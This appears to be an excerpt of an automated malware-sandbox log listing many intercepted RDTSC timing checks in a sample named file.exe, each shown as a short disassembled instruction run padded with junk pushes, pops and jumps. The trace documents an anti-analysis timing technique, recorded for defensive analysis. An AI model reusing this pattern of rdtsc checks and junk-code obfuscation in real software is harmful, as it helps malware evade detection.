Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74A19E second address: 74A1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E925 second address: 74E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD0F8CDABF1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E941 second address: 74E945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E945 second address: 74E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD0F8CDAC00h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EAF5 second address: 74EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EDF4 second address: 74EDFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EDFA second address: 74EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD0F8E1A7A8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EE08 second address: 74EE28 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8CDABECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EE28 second address: 74EE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7ADh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7AAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F253 second address: 74F264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F264 second address: 74F269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F4F0 second address: 74F4FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F4FC second address: 74F532 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7ACh 0x00000008 jng 00007FD0F8E1A7A6h 0x0000000e pushad 0x0000000f jc 00007FD0F8E1A7A6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD0F8E1A7B7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F664 second address: 74F676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FD0F8CDABE6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F676 second address: 74F680 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F680 second address: 74F6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FD0F8CDABF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F6B0 second address: 74F6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnl 00007FD0F8E1A7A6h 0x0000000c jbe 00007FD0F8E1A7A6h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007FD0F8E1A7A6h 0x0000001a jmp 00007FD0F8E1A7B5h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F6E1 second address: 74F6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7535DD second address: 7535E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7535E3 second address: 7535E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7535E7 second address: 7535ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7535ED second address: 7535F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 757F9F second address: 757FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FD0F8E1A7A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75C249 second address: 75C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD0F8CDABE6h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75C261 second address: 75C265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75C265 second address: 75C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD0F8CDABE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75C79E second address: 75C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75C7A2 second address: 75C7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D183 second address: 75D19D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD0F8E1A7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75FE67 second address: 75FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75FE6B second address: 75FEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD0F8E1A7B7h 0x0000000d popad 0x0000000e push ebx 0x0000000f push edi 0x00000010 jmp 00007FD0F8E1A7B1h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 762269 second address: 762270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 763DF6 second address: 763E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a jo 00007FD0F8E1A7A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 763E06 second address: 763E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 763E23 second address: 763E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 765455 second address: 765459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7699CD second address: 7699DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7699DF second address: 7699EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7699EA second address: 769A0D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76B346 second address: 76B351 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76F929 second address: 76F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FD0F8E1A7A6h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FD0F8E1A7B6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76F958 second address: 76F95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76F95E second address: 76F96F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720A61 second address: 720A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720A65 second address: 720AA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007FD0F8E1A7A6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jp 00007FD0F8E1A7AEh 0x00000016 nop 0x00000017 add dword ptr [ebp+122D17D3h], ebx 0x0000001d mov ebx, dword ptr [ebp+12494C9Eh] 0x00000023 adc ecx, 6E309C2Ah 0x00000029 add eax, ebx 0x0000002b sbb di, 95FFh 0x00000030 push eax 0x00000031 js 00007FD0F8E1A7B8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720AA8 second address: 720AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770995 second address: 77099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7749EC second address: 7749F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7749F9 second address: 774A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774A06 second address: 774A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD0F8CDABE6h 0x00000009 jmp 00007FD0F8CDABF1h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774A27 second address: 774A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 773FAD second address: 773FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 773FB1 second address: 773FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774511 second address: 77452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD0F8CDABF5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77452E second address: 774578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007FD0F8E1A7A6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD0F8E1A7B2h 0x00000017 jmp 00007FD0F8E1A7B2h 0x0000001c popad 0x0000001d jmp 00007FD0F8E1A7B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CC99 second address: 77CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCAF second address: 77CCC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BB59 second address: 77BB70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8CDABE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007FD0F8CDABE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BE2C second address: 77BE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BE30 second address: 77BE3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BE3F second address: 77BE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a jng 00007FD0F8E1A7A6h 0x00000010 jmp 00007FD0F8E1A7ADh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BE5D second address: 77BE99 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 jmp 00007FD0F8CDABECh 0x0000000d jne 00007FD0F8CDABEEh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FD0F8CDABEDh 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD0F8CDABE6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BE99 second address: 77BE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C6E0 second address: 77C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C6EA second address: 77C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FD0F8E1A7A6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FD0F8E1A7B5h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 781600 second address: 781605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 785368 second address: 785379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD0F8E1A7A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 785379 second address: 785392 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 785392 second address: 785396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784612 second address: 78461C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78461C second address: 78463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007FD0F8E1A7B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78463A second address: 78463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784A47 second address: 784A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD0F8E1A7A8h 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007FD0F8E1A7B1h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784C26 second address: 784C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 je 00007FD0F8CDABEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784F5A second address: 784F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FD0F8E1A7AAh 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784F6B second address: 784F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 784F71 second address: 784F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CA54 second address: 78CA5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DD1B second address: 78DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DD21 second address: 78DD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD0F8CDABE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E4A7 second address: 78E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E4AC second address: 78E4D1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABECh 0x00000008 push ecx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C412 second address: 78C418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C418 second address: 78C41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C41E second address: 78C422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C422 second address: 78C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E74 second address: 793E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E78 second address: 793E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 je 00007FD0F8CDABE6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E9F second address: 793EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793EA3 second address: 793EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9952 second address: 6D996D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FD0F8E1A7A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0ED6 second address: 7A0F09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD0F8CDABEEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jmp 00007FD0F8CDABF8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0F09 second address: 7A0F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2CD5 second address: 7A2CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2B6B second address: 7A2B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
